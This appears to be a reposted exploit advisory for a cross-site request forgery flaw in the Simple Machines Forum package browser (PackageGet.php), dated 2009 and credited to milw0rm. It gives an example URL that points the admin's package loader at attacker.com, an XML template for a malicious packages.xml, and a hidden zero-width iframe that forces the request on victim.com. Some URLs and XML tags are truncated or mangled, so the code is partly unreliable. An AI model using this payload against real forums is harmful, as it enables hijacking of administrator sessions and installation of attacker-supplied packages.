Vulnerable Version: All
The Bug is located in the file: Sources/PackageGet.php
Örnek :
http://victm.com/index.php?action=pa...//attacker.com
When the admin link between the SMF to load the file:
http://attacker.com/packages.xml
Save this file as packages.xml
< ?xml version="1.0"? >
< !DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list" >
< xmlns="http://www.simplemachines.org/xml/package-list" smf="http://www.simplemachines.org/">
and generate the XSRF:
< iframe src="http://victim.com/index.php?action=packageget;sa=browse;absolute=htt%20p://attacker.com" scrolling="no" width="0%">
# milw0rm.com [2009-01-26]
0 yorum:
Yorum Gönder